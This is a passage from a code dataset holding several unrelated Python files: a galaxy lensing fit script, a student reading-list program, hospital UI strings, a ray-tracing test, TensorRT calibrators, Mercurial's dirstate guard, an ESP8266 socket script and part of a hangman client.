file for a catalogue is required for object identification.\n.. Best-fit parameters are dynamically saved in dataframe form to a pickle file.\n\"\"\"\n\n# Catalogue choice\ncat_choice = 'COSMOS'\n# Choice of bands\nbands = ['F814W', 'F606W', 'F125W']\n# If no extra condition is required, use condition = ''\n# .. You may wish to have condition = _PSF, say, to \n# .. differentiate between runs that do or do not \n# .. convolve a PSF\n# .. e.g. condition = '_F814W_COSMOS_no-PSF'\ncondition = ''\n \n# Prepare Catalogue\nif cat_choice == 'COSMOS':\n path_to_cat = '../Catalogues/COSMOS/'\n prep_file = 'COSMOS-morph-info-rev1.pkl'\n im_fold = ['Images_'+bands[i]+'/' for i in range(len(bands))]\n input_params = ['name','class','z','U-R']\nelse:\n print('Error! 
Need a catalog choice.')\n\ndef update_progress(job_title, progress):\n \"\"\"\n Progress bar\n \"\"\"\n length = 20 # modify this to change the length\n block = int(round(length*progress))\n msg = \"\\r{0}: |{1}| {2}%\".format(job_title, \"[]\"*block + \"-\"*(length-block), round(progress*100, 2))\n if progress >= 1: msg += \" Complete\\r\\n\"\n sys.stdout.write(msg)\n sys.stdout.flush()\n\n# Parameters for pickle file \noutput_params = ['xc','yc','ns','rs','q','phi', # Galaxy fit parameters\n 'psi11','psi12','psi22','psi111','psi112','psi122','psi222', # Lensing fit parameters\n 'err_xc','err_yc','err_ns','err_rs','err_q','err_phi', # Error on galaxy fit parameters\n 'err_psi11','err_psi12','err_psi22', # Error on lensing fit parameters\n 'err_psi111','err_psi112','err_psi122','err_psi222', # --\n 'rchi2', # chisquared of fit\n 'F1_fit', 'F2_fit', # Flexion from fi\n 'G1_fit', 'G2_fit', # --\n 'I0', 'a'] # Galaxy normalization and size\n\n# Prepare pickle file\ncol_list = input_params+output_params \noutput_filename = cat_choice+'_'+str(time.localtime()[1])+str(time.localtime()[2])+str(time.localtime()[0])\n# .. dict of variable lists\narrs = {k:[] for k in range(len(input_params+output_params))} \n\n# Get the list of objects to loop through LENSER\n# .. Read in prep frame file\nprep_frame = pd.read_pickle(path_to_cat+prep_file)\n# .. Optional: do not run galaxies of irregular type through Lenser\n#prep_frame = prep_frame[(prep_frame['class'] != 'irregular')]\n# .. Get ID list\nID_list = prep_frame.index.values \n\n# Lenser Analysis Loop\ninit=0\nfor i in ID_list:\n # get the name of object with index i\n objname = prep_frame.name.loc[i] \n print(' \\n')\n print('Object '+str(i)+' - '+objname)\n init+=1\n \n try:\n # Lenser analysis\n print('Running Lenser')\n\n # .. Prepare lists for multi-band fitting\n name_list = []\n dat_list = []\n rms_list = []\n seg_list = []\n psf_list = []\n bg_list = []\n \n for j in range(len(bands)):\n # .. Image name\n imname = objname+'_'+bands[j]\n # .. Read in image from FITS file\n path_to_image = path_to_cat+im_fold[j]+imname+'.fits'\n f = FITS(path_to_image)\n dat = f.get_FITS('data')\n rms = f.get_FITS('noise')\n seg = f.get_FITS('segmask')\n psf = f.get_FITS('psf')\n bg = f.get_FITS('bgmask')\n # .. Append multi-band list\n name_list.append(imname)\n dat_list.append(dat)\n rms_list.append(rms)\n seg_list.append(seg)\n psf_list.append(psf)\n bg_list.append(bg)\n\n # .. Now do multi-fit\n multiname = objname+'_multi_band_fit'\n myMultiImage = MultiImage(namelist = name_list, datalist = dat_list, noiselist = rms_list,\n seglist = seg_list, psflist = psf_list, bgmasklist = bg_list)\n # .. Initialize AIM model\n myModel = aimModel(myMultiImage = myMultiImage)\n # Run local minimization\n myModel.runLocalMinRoutine()\n # Get flexion from fit\n F, G = myModel.psi3ToFlexion()\n F1_fit = F[0]\n F2_fit = F[1]\n G1_fit = G[0]\n G2_fit = G[1]\n # Get size\n a = myModel.size() \n # Get values to save\n fit_pars = np.append(myModel.parsWrapper(), myModel.parsErrorWrapper())\n other_pars = np.array((myModel.chisquared,\n F1_fit, F2_fit,\n G1_fit, G2_fit,\n myModel.I0, a))\n output_vals = np.append(fit_pars, other_pars)\n # Empty model\n myModel.empty()\n\n except:# ValueError:\n print('Error, skipping')\n output_vals = np.nan*np.ones(len(output_params))\n\n # .. 
Build dictionary for quick, dynamic dataframe building per iteration\n for k,l in zip(col_list,range(len(col_list))):\n if k in output_params: #if output parameter, append value appropriately\n arrs[l].append(output_vals[abs(len(input_params)-l)])\n else:\n sel_id = prep_frame[prep_frame.name==objname].index[0]\n prep_val = prep_frame[k].loc[sel_id]\n arrs[l].append(prep_val)\n # .. Build the dataframe\n data = {k:arrs[l] for k,l in zip(col_list,range(len(col_list)))}\n out_frame = pd.DataFrame(data=data,columns=col_list)\n out_frame.to_pickle(path_to_cat+output_filename+'-'+str(len(ID_list))+'_objects_multi-fit'+condition+'.pkl')\n","repo_name":"DrexelLenser/Lenser","sub_path":"examples/run_cat/lenser_run_cat_multi_fit.py","file_name":"lenser_run_cat_multi_fit.py","file_ext":"py","file_size_in_byte":6253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"10963927959","text":"\"\"\"\r\nName: Reuben Bogogolelo\r\nDate: 27 December 2016 - 11 January 2017\r\nBrief program details:\r\nThis program loads everything on the books.csv and will show the quantity of items in the main(). It consists of 8 functions,\r\nwith one function being main() controlling all other seven functions. The program display the list of required/completed books\r\nbased on user input. The program has been designed to add the new books to the list as in the csv file and make the book from\r\nrequired to completed, which change the value in the list file_list. After the user quits the program, it then reads the file\r\nand then overwrite the list of book in the file books.csv. Its been made (program) to handle the error-checking.\r\n\r\nRepository: https://github.com/reubenbogogolelo.......\r\n\r\n\"\"\"\r\n\r\nfrom operator import itemgetter\r\nFILENAME = \"books.csv\"\r\nINPUT_LIST = ['R','C','A','M','Q']\r\nglobal index_of_Required_Books\r\nindex_of_Required_Books =[]\r\nUserInputToMark = ''\r\nfile_list = []# pls explain wat ths array is supposed to do\r\n#selectedIndex = 0 #for debugging remove later\r\n\r\ndef read_file():\r\n global file_list\r\n file_pointer = open(FILENAME)\r\n for index, data in enumerate (file_pointer.readlines()):\r\n data = data.strip()\r\n datum = data.split(\",\")\r\n file_list.append(datum)\r\n file_list.sort(key=itemgetter(1,2))\r\n file_pointer.close()\r\n return file_list\r\n\r\n\r\ndef print_header(): #this function is designed to list the books as read by read_file() and brings the menu for the user to chose based on their option.\r\n print(\"\"\"\r\nReading list 1.0 - by Reuben\r\n{} books loaded from books.csv\r\n \"\"\".format(len(file_list)))\r\n print(\"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n\r\n\r\ndef display_books(selected_input):#this function is designed to display the books marked as completed or required ones as per the users input choice.\r\n counter_one =0\r\n total_pages = 0\r\n global index_of_Required_Books\r\n index_of_Required_Books = []\r\n\r\n if selected_input.upper()=='C': # to take care of the completed books only.\r\n variable_text = \"Completed books:\"\r\n elif selected_input.upper()=='R':# to take care of the required books only.\r\n variable_text = \"Required books:\"\r\n print(variable_text)\r\n\r\n for i in range(0, (len(file_list))):\r\n if file_list[i][3].upper() == selected_input.upper(): #this will Sort the books as they appear on the csv file.\r\n print(\"{}. 
{:50} by {:20} {} pages\" .format(i, file_list[i][0],file_list[i][1],file_list[i][2]))\r\n index_of_Required_Books.append(int(i))\r\n counter_one +=1\r\n total_pages += int(file_list[i][2])#this will add all the pages of books marked as completed\r\n\r\n\r\n print(\"Total pages for {} book: {} \".format(counter_one, total_pages))\r\n\r\n print(\"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n\r\n\r\ndef marking_a_book(selected_input):# has been designed to list the number of a book to mark as completed.\r\n global selectedIndex\r\n if (selected_input == \"M\") or (selected_input == \"m\"):\r\n display_books('r')\r\n print(\"Enter the number of a book to mark as completed\")\r\n while True:\r\n try:\r\n UserInputToMark = int(input(\">>>\"))\r\n break\r\n except ValueError:\r\n print('Invalid input; enter a valid number')\r\n #input choice should be 'm/M' otherwise any other unput will be handled.\r\n print(\r\n \"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n\r\n Flag = False\r\n for i in range(0, (len(index_of_Required_Books))):\r\n\r\n if (index_of_Required_Books[i]) == UserInputToMark:\r\n Flag = True\r\n break\r\n\r\n if Flag == False:\r\n print(\"That book is already completed\")# it will print the text when the flag is False.\r\n print(\"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n UserInputToMark = input(\">>>\")\r\n\r\n if UserInputToMark.upper() == \"M\":\r\n display_books('r')\r\n\r\n while True:\r\n try:\r\n global finalMarkingInupt\r\n finalMarkingInupt = int(input(\">>>\"))\r\n\r\n break\r\n except ValueError:\r\n print('Invalid input; enter a valid number')\r\n\r\n for j in range(0, (len(index_of_Required_Books))):\r\n\r\n if index_of_Required_Books[j] == finalMarkingInupt:\r\n file_list[j][3] = \"c\"# will only display the marked as 'c' in the csv file\r\n print(\"{} by {} marked as completed\".format(file_list[j][0], file_list[j][1]))\r\n print(\"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n UserInputToMark = input(\">>>\")\r\n if (UserInputToMark.upper() != \"A\") or (UserInputToMark.upper() != \"Q\"):\r\n print(\"Invalid input menu choice\")\r\n\r\n\r\ndef adding_a_book(UserInputToMark):# designed to add a new book.\r\n flag=True\r\n if UserInputToMark.upper() == \"A\": #input should be 'a' only when the user wants to add the new book.\r\n while True:\r\n print(\"Input can not be blank\")\r\n UserInputToMarkTitle = input(\"Title: \")#promts the user to input tittle of the book to be added.\r\n if (UserInputToMarkTitle != \"\"):# input should not be blank\r\n break\r\n\r\n while True:\r\n print(\"Input can not be blank\")\r\n UserInputToMarkAuthor = input(\"Author: \")#promts the user to input the author of the book to be added.\r\n if (UserInputToMarkAuthor != \"\"):#input should not be blank.\r\n break\r\n\r\n while flag:\r\n try:\r\n UserInputToMarkPages = int(input(\"Pages: \"))#promts the user to input the number of pages of a book to be added.\r\n\r\n while UserInputToMarkPages <0:\r\n print(\"Number must be >= 0\")# number of pages should not be less than 0.\r\n UserInputToMarkPages = int(input(\"Pages: \"))\r\n flag=False\r\n except ValueError:\r\n print('Invalid input; enter a valid number')\r\n\r\n 
AddedBookDetail = []\r\n AddedBookDetail.append(UserInputToMarkTitle)# title will be appended to the list.\r\n AddedBookDetail.append(UserInputToMarkAuthor)# author will be appended to the list.\r\n AddedBookDetail.append(str(UserInputToMarkPages))#pages will be appended to the list.\r\n AddedBookDetail.append('r')\r\n file_list.append(AddedBookDetail)#the book will be appended accordigly.\r\n print('{} by {}, ({}) added to reading list'.format(UserInputToMarkTitle, UserInputToMarkAuthor, UserInputToMarkPages))\r\n print(\r\n \"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n\r\n\r\ndef main():#the main function as the master controller will let the user enter the option.\r\n read_file()# this function will be called\r\n print_header()# this function will be called\r\n highLevelInput = input(\">>>\")# input prompt\r\n\r\n while True:\r\n if (highLevelInput.upper() == 'R') or highLevelInput.upper() == 'C' or highLevelInput.upper() == 'A' or highLevelInput.upper() == 'M' or highLevelInput.upper() == 'Q':\r\n Dummy =1 #Dummy code\r\n else:\r\n print((highLevelInput.upper() != 'R') or highLevelInput.upper() != 'C' or highLevelInput.upper() != 'A' or highLevelInput.upper() != 'M' or highLevelInput.upper() != 'Q')\r\n #print(highLevelInput.upper()!='Q')\r\n while True:\r\n print(\"Invalid Menu Choice\")\r\n print(\"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n highLevelInput = input(\">>>\")\r\n if highLevelInput.upper() != 'R' or highLevelInput.upper() != 'C' or highLevelInput.upper() != 'A' or highLevelInput.upper() != 'M' or highLevelInput.upper() != 'Q':\r\n break\r\n\r\n if highLevelInput.upper()=='R':\r\n display_books('r')#if the option is true, then the display() will be called\r\n elif highLevelInput.upper() == 'C':\r\n display_books('c')#if the option is true, then the display() will be called\r\n elif highLevelInput.upper() == 'A':\r\n adding_a_book('a')#if the option is true, then the adding_a_book() function will be called\r\n elif highLevelInput.upper() == 'M':\r\n marking_a_book('m')#if the option is true, then the marking() will be called\r\n highLevelInput = input(\">>>\")#input prompt for the user for all the above functions.\r\n\r\n if (highLevelInput.upper() == \"Q\"): #the choice is restricted to 'Q/q' and will exit the program.\r\n print(\"{} books saved to {}\".format(len(file_list), FILENAME))# this will list all the books in the csv file.\r\n print(\"Have a nice day :)\")\r\n\r\n return\r\n\r\nmain()\r\n\r\n\r\n","repo_name":"rsbogogolelo/ReubenA1","sub_path":"CP1404assignment1.py","file_name":"CP1404assignment1.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42640595787","text":"### Localized Strings ##\n\nHTML_TITLE = \"MicroKIS Staging\"\n\nERR_UNKNOWN = \"Unbekannter Fehler\"\nERR_NO_CON_TO_GW = \"Keine Verbindung zum Gateway! 
Es wurden keine Daten ans Monitoring gesendet!\"\nERR_BED_DOES_NOT_EXIST = \"Bett existiert nicht!\"\nERR_GW_ASYNC = \"GW Aync Error\"\n\nBEDS_REFRESH_SUCCESS = \"Betten erfolgreich aktualisiert\"\nGW_UPDATE_SENT = \"Aktualisierung an Monitoring gesendet!\"\nBED_FORCE_DELETE = \"Bett wurde entfernt- Force Remove!\"\n\nBTN_DISCHARGE = \"Patient Entlassen\"\nBTN_DETAILS = \"Mehr Infos\"\nBTN_ADMIT = \"Aufnahme\"\nFREE_BED = \"Freies Bett\"\n\nPATIENT_NAME = \"Name\"\nPATIENT_ID = \"Patienten ID\"\nPATIENT_ADMIT_DATE = \"Aufnahme Datum\"\n\nCAPTION_DASHBOARD = \"Übersicht\"\n\nDATAPRIVACY_NOTES = \"Hinweise zum Datenschutz\"\nTERMS_AND_CONDITIONS = \"Nutzungshinweise\"\n\nCAPTION_ADMISSION = \"Patientenaufnahme\"\n\nNEW_PATIENT = \"Neuer Patient\"\nGIVEN_NAME = \"Vorname\"\nLAST_NAME = \"Nachname\"\n\nPATIENT_BED = \"Bett\"\nPATIENT_STATION = \"Station\"\n\nPATIENT_STATUS = \"Patienten Bericht\"\n\n\n############# Localization of Parameter Labels is done Here ####################\n\nLOCALIZED_PARM={}\nLOCALIZED_PARM[\"spo2\"] = \"Sättigung\"\nLOCALIZED_PARM[\"hr\"] = \"HF \"\nLOCALIZED_PARM[\"524288^SPEEDY_TEMP^EHC\"] = \"Stirn Temp\"#\nLOCALIZED_PARM[\"393218^NIBP_MEAN^EHC\"] = \"NIBP Mitteldruck\"\nLOCALIZED_PARM[\"393217^NIBP_DIA^EHC\"] = \"NIBP Diastolisch\"\nLOCALIZED_PARM[\"393216^NIBP_SYS^EHC\"] = \"NIBP Systolisch\"\nLOCALIZED_PARM[\"327680^SPO2_SPO2^EHC\"] = \"Sättigung\"\nLOCALIZED_PARM[\"327681^SPO2_PR^EHC\"] = \"Puls \"\n\n\n\nPARM_COLOR={}\nPARM_COLOR[\"524288^SPEEDY_TEMP^EHC\"] = \"black\"\nPARM_COLOR[\"393218^NIBP_MEAN^EHC\"] = \"purple\"\nPARM_COLOR[\"393217^NIBP_DIA^EHC\"] = \"purple\"\nPARM_COLOR[\"393216^NIBP_SYS^EHC\"] = \"purple\"\nPARM_COLOR[\"327680^SPO2_SPO2^EHC\"] = \"blue\"\nPARM_COLOR[\"327681^SPO2_PR^EHC\"] = \"green \"","repo_name":"Dankredues/microKIS","sub_path":"strings_de.py","file_name":"strings_de.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37384693629","text":"\"\"\"\nTest whether source rotation induces unwanted roll.\n\nTry adjusting source_y_offset with source.angle_type 'vector' (the default) and you will\nnotice an unwanted roll appearing in the source.\n\"\"\"\nimport math\n\nimport pyvista as pv\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_graphics.geometry.transformation.quaternion as quaternion\n\nimport tfrt.sources as sources\nimport tfrt.distributions as distributions\nimport tfrt.drawing as drawing\n\nsource_size = 1.0\ntarget_z_distance = 20.0\ntarget_x_size = 40.0\ntarget_y_size = 40.0\n\n# offset between the center of the source and the center of the target in the x-y plane.\nsource_x_offset = 10.0\nsource_y_offset = 20.0\nsource_angular_cutoff = 15.0\n\nray_sample_count = 35*35\nwavelengths = [drawing.YELLOW]\n\n# =============================================================================\n# Re-interpret some of the above parameters\n\n# convert to radians\nPI = tf.constant(math.pi, dtype=tf.float64)\nsource_angular_cutoff *= PI/180.0\n\n# reduce ray sample count since it needs to be a square number\nsqrt_ray_sample_count = math.floor(math.sqrt(ray_sample_count))\nray_sample_count = sqrt_ray_sample_count*sqrt_ray_sample_count\n\n# actually want the center-to-edge distance, i.e. 
the 'square radius'.\nsource_size /= 2\n\n# =============================================================================\n# Make the source.\nangle_type = \"quaternion\"\nif angle_type == \"vector\":\n source_angle = np.array(\n (\n 0.0,\n -source_y_offset,\n target_z_distance\n ),\n dtype=np.float64\n )\nelse:\n rot1 = quaternion.from_euler((0.0, -PI/2, 0.0))\n rot2 = quaternion.from_euler(tf.cast(\n (\n math.atan2(source_y_offset, target_z_distance),\n 0.0,\n 0.0\n ),\n dtype=tf.float64\n ))\n source_angle = quaternion.multiply(rot2, rot1)\n \nsource_center = np.array(\n (\n source_x_offset,\n source_y_offset,\n -target_z_distance\n ),\n dtype=np.float64\n)\nangular_distribution = distributions.SquareRankLambertianSphere(\n ray_sample_count,\n source_angular_cutoff\n)\nbase_point_distribution = distributions.RandomUniformSquare(\n source_size,\n sqrt_ray_sample_count\n)\nsource = sources.AngularSource(\n 3,\n source_center,\n source_angle,\n angular_distribution,\n base_point_distribution,\n wavelengths,\n dense=False,\n ray_length=100,\n angle_type=angle_type\n)\n\n# =============================================================================\n# Set up the plot\n\nplot = pv.Plotter()\nplot.add_axes()\nray_drawer = drawing.RayDrawer3D(plot)\n\n# draw a visual target in the x-y plane, for reference\nvisual_target = pv.Plane(\n center=(0, 0, 0),\n direction=(0, 0, 1),\n i_size = target_x_size,\n j_size = target_y_size,\n i_resolution = 1,\n j_resolution = 1\n)\nplot.add_mesh(visual_target, color=\"green\")\n\n# draw a visual backing that the source will slide along, at the proper\n# rotation and offset\nvisual_backing = pv.Plane(\n center=(0.0, .99*source_y_offset, -.99*target_z_distance),\n direction=(0.0, -source_y_offset, target_z_distance),\n i_size = target_y_size,\n j_size = 5*source_size,\n i_resolution = 1,\n j_resolution = 1\n)\nplot.add_mesh(visual_backing, color=\"green\")\n\n# =============================================================================\n# Define the plot interface\n\ndef redraw():\n source.update()\n ray_drawer.rays = source\n ray_drawer.draw()\nredraw()\n\nplot.show()\n\n\n\n","repo_name":"ecpoppenheimer/TensorFlowRayTrace","sub_path":"dev/source_rotation_roll_test.py","file_name":"source_rotation_roll_test.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"25832098510","text":"\"\"\"_summary_\n\n:return: _description_\n:rtype: _type_\n\"\"\"\n\nimport os\n\nimport tensorrt as trt\nimport pycuda.driver as cuda\n\nimport numpy as np\n\nfrom .image_batcher import ImageBatcher # pylint: disable=import-error\nfrom .logger import TrtLogger # pylint: disable=import-error\n\n\nclass CalibratorBase:\n \"\"\"_summary_\n\n :param cache_file: _description_\n :type cache_file: str\n :param logger: _description_\n :type logger: object\n :param quantile: _description_, defaults to 0.5\n :type quantile: float, optional\n :param regression_cutoff: _description_, defaults to 0.5\n :type regression_cutoff: float, optional\n \"\"\"\n\n def __init__(\n self,\n cache_file: str,\n logger: object,\n quantile: float = 0.5,\n regression_cutoff: float = 0.5):\n \"\"\"_summary_\n \"\"\"\n\n self.quantile = quantile\n self.regression_cutoff = regression_cutoff\n\n self.trt_logger = logger\n self.cache_file = cache_file\n self.image_batcher = None\n self._batch_generator = None\n self._batch_allocation = None\n\n def get_regression_cutoff(self):\n \"\"\"\n __summary__\n \"\"\"\n 
return self.regression_cutoff\n\n def get_quantile(self):\n \"\"\"\n __summary__\n \"\"\"\n return self.quantile\n\n def set_image_batcher(self, image_batcher: ImageBatcher):\n \"\"\"\n __summary__\n \"\"\"\n\n self.image_batcher = image_batcher\n size = int(\n np.dtype(\n self.image_batcher.dtype).itemsize *\n np.prod(\n self.image_batcher.shape))\n self._batch_allocation = cuda.mem_alloc(\n size) # pylint: disable=no-member\n self._batch_generator = self.image_batcher.get_batch()\n\n def get_batch_size(self):\n \"\"\"\n __summary__\n \"\"\"\n\n if self.image_batcher:\n return self.image_batcher.batch_size\n return 1\n\n def get_batch(self, names: object):\n # pylint: disable=unused-argument\n \"\"\"\n __summary__\n \"\"\"\n if not self.image_batcher:\n return None\n try:\n batch, _ = next(self._batch_generator)\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n f\"Calibrating image {self.image_batcher.image_index} \\\n/ {self.image_batcher.num_images}\")\n cuda.memcpy_htod( # pylint: disable=no-member\n self._batch_allocation,\n np.ascontiguousarray(batch))\n return [int(self._batch_allocation)]\n\n except StopIteration:\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n \"Finished calibration batches\")\n return None\n\n def read_histogram_cache(self, *args):\n # pylint: disable=unused-argument\n \"\"\"\n Overrides from trt.IInt8Calibrator.\n Read the calibration cache file stored on disk, if it exists.\n :return: The contents of the cache file, if any.\n \"\"\"\n if self.cache_file is not None and os.path.exists(self.cache_file):\n with open(self.cache_file, \"rb\") as histogram_file:\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n f\"Using histogram calibration cache file: \\\n{self.cache_file}\")\n return histogram_file.read()\n else:\n return None\n\n def read_calibration_cache(self):\n \"\"\"\n Overrides from trt.IInt8Calibrator.\n Read the calibration cache file stored on disk, if it exists.\n :return: The contents of the cache file, if any.\n \"\"\"\n if self.cache_file is not None and os.path.exists(self.cache_file):\n with open(self.cache_file, \"rb\") as read_file:\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n f\"Using calibration cache file: {self.cache_file}\")\n return read_file.read()\n else:\n return None\n\n def write_calibration_cache(self, cache, **kwargs):\n # pylint: disable=unused-argument\n \"\"\"\n Overrides from trt.IInt8Calibrator.\n Store the calibration cache to a file on disk.\n :param cache: The contents of the calibration cache to store.\n \"\"\"\n if self.cache_file is not None:\n with open(self.cache_file, \"wb\") as calib_cache:\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n f\"Writing calibration cache data to: {self.cache_file}\")\n calib_cache.write(cache)\n\n def write_histogram_cache(self, cache: object):\n \"\"\"\n Overrides from trt.IInt8Calibrator.\n Store the calibration cache to a file on disk.\n :param cache: The contents of the calibration cache to store.\n \"\"\"\n if self.cache_file is not None:\n with open(self.cache_file, \"wb\") as histogram_cache:\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n f\"Writing histogram calibration cache data to: \\\n{self.cache_file}\")\n histogram_cache.write(cache)\n\n\nclass IInt8LegacyCalibrator(CalibratorBase, trt.IInt8LegacyCalibrator):\n # pylint: disable=no-member\n \"\"\"_summary_\n\n :param cache_file: _description_\n :type cache_file: str\n :param logger: _description_\n :type logger: object\n :param quantile: _description_, defaults to 
0.5\n :type quantile: float, optional\n :param regression_cutoff: _description_, defaults to 0.5\n :type regression_cutoff: float, optional\n \"\"\"\n\n def __init__(self, cache_file: str,\n logger: TrtLogger,\n quantile: float = 0.5,\n regression_cutoff: float = 0.5):\n \"\"\"_summary_\n \"\"\"\n\n trt.IInt8LegacyCalibrator.__init__(self)\n CalibratorBase.__init__(self, cache_file,\n logger, quantile,\n regression_cutoff)\n\n\nclass IInt8EntropyCalibrator(CalibratorBase, trt.IInt8EntropyCalibrator):\n # pylint: disable=no-member\n \"\"\"_summary_\n\n :param CalibratorBase: _description_\n :type CalibratorBase: _type_\n :param trt: _description_\n :type trt: _type_\n \"\"\"\n\n def __init__(self, cache_file: str,\n logger: TrtLogger):\n trt.IInt8EntropyCalibrator.__init__(self)\n CalibratorBase.__init__(self, cache_file, logger)\n\n\nclass IInt8EntropyCalibrator2(CalibratorBase, trt.IInt8EntropyCalibrator2):\n # pylint: disable=no-member\n \"\"\"_summary_\n\n :param CalibratorBase: _description_\n :type CalibratorBase: _type_\n :param trt: _description_\n :type trt: _type_\n \"\"\"\n\n def __init__(self, cache_file: str, logger: TrtLogger):\n trt.IInt8EntropyCalibrator2.__init__(self)\n CalibratorBase.__init__(self, cache_file, logger)\n\n\nclass IInt8MinMaxCalibrator(CalibratorBase, trt.IInt8MinMaxCalibrator):\n # pylint: disable=no-member\n \"\"\"_summary_\n\n :param CalibratorBase: _description_\n :type CalibratorBase: _type_\n :param trt: _description_\n :type trt: _type_\n \"\"\"\n\n def __init__(self, cache_file: str, logger: TrtLogger):\n trt.IInt8MinMaxCalibrator.__init__(self)\n CalibratorBase.__init__(self, cache_file, logger)\n","repo_name":"MaximeDebarbat/Dolphin","sub_path":"dolphin/TrtWrapper/utils/calibrator.py","file_name":"calibrator.py","file_ext":"py","file_size_in_byte":7396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"18227864015","text":"from __future__ import absolute_import\n\nimport os\nfrom .i18n import _\n\nfrom . import (\n error,\n narrowspec,\n requirements,\n util,\n)\n\n\nclass dirstateguard(util.transactional):\n \"\"\"Restore dirstate at unexpected failure.\n\n At the construction, this class does:\n\n - write current ``repo.dirstate`` out, and\n - save ``.hg/dirstate`` into the backup file\n\n This restores ``.hg/dirstate`` from backup file, if ``release()``\n is invoked before ``close()``.\n\n This just removes the backup file at ``close()`` before ``release()``.\n \"\"\"\n\n def __init__(self, repo, name):\n self._repo = repo\n self._active = False\n self._closed = False\n\n def getname(prefix):\n fd, fname = repo.vfs.mkstemp(prefix=prefix)\n os.close(fd)\n return fname\n\n self._backupname = getname(b'dirstate.backup.%s.' % name)\n repo.dirstate.savebackup(repo.currenttransaction(), self._backupname)\n # Don't make this the empty string, things may join it with stuff and\n # blindly try to unlink it, which could be bad.\n self._narrowspecbackupname = None\n if requirements.NARROW_REQUIREMENT in repo.requirements:\n self._narrowspecbackupname = getname(\n b'narrowspec.backup.%s.' 
% name\n )\n narrowspec.savewcbackup(repo, self._narrowspecbackupname)\n self._active = True\n\n def __del__(self):\n if self._active: # still active\n # this may occur, even if this class is used correctly:\n # for example, releasing other resources like transaction\n # may raise exception before ``dirstateguard.release`` in\n # ``release(tr, ....)``.\n self._abort()\n\n def close(self):\n if not self._active: # already inactivated\n msg = (\n _(b\"can't close already inactivated backup: %s\")\n % self._backupname\n )\n raise error.Abort(msg)\n\n self._repo.dirstate.clearbackup(\n self._repo.currenttransaction(), self._backupname\n )\n if self._narrowspecbackupname:\n narrowspec.clearwcbackup(self._repo, self._narrowspecbackupname)\n self._active = False\n self._closed = True\n\n def _abort(self):\n if self._narrowspecbackupname:\n narrowspec.restorewcbackup(self._repo, self._narrowspecbackupname)\n self._repo.dirstate.restorebackup(\n self._repo.currenttransaction(), self._backupname\n )\n self._active = False\n\n def release(self):\n if not self._closed:\n if not self._active: # already inactivated\n msg = (\n _(b\"can't release already inactivated backup: %s\")\n % self._backupname\n )\n raise error.Abort(msg)\n self._abort()\n","repo_name":"JetBrains/intellij-community","sub_path":"plugins/hg4idea/testData/bin/mercurial/dirstateguard.py","file_name":"dirstateguard.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"15353749655","text":"from upysh import *\r\nimport network\r\nimport socket\r\nimport utime\r\nfrom machine import Pin\r\n\r\np=Pin(2,mode=Pin.IN)\r\nap_if = network.WLAN(network.AP_IF)\r\nap_if.active(False)\r\nap_if.active(True)\r\nap_if.config(essid='ESP8266',password='12345678')\r\n\r\nprint(ap_if.ifconfig()[0])\r\naddr = socket.getaddrinfo('0.0.0.0',80)[0][-1]\r\nstate = 0 #0-stop,1-move\r\nconnect=0\r\ns = socket.socket()\r\ns.bind(addr)\r\ns.listen(1)\r\n\r\ntry: \r\n print(\"连接中.....\")\r\n conn, addr = s.accept()\r\n print('client connected from', addr)\r\n while True:\r\n request = conn.recv(1024)\r\n conn.send(b'1') \r\n \r\nexcept KeyboardInterrupt:\r\n conn.close()","repo_name":"chentuochao/projection-game","sub_path":"AP.py","file_name":"AP.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30323061649","text":"import signal\nimport sys\nimport socket\nimport curses\nfrom curses import wrapper\n\nhost = \"127.0.0.1\"\nport = 12345\n\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nstick_man_parts = [\n (4, 2, \"|\"),\n (5, 2, \"|\"),\n (6, 2, \"O\"),\n (7, 1, \"/\"),\n (7, 2, \"|\"),\n (7, 3, \"\\\\\"),\n (8, 2, \"|\"),\n (9, 2, \"/\"),\n (9, 3, \"\\\\\"),\n]\n\n\ndef signal_handler(sig, frame):\n print('Close client')\n client_socket.close()\n sys.exit(0)\n\n\ndef draw_stick_man(stdscr, attempts):\n for i in range(attempts):\n y, x, char = stick_man_parts[i]\n stdscr.addstr(y, x, char)\n\n\ndef display_message(stdscr, y, message):\n stdscr.move(y, 0)\n stdscr.clrtoeol()\n stdscr.addstr(message)\n stdscr.refresh()\n\n\ndef display_welcome(stdscr):\n display_message(stdscr, 0, \"Welcome to Hangman! 
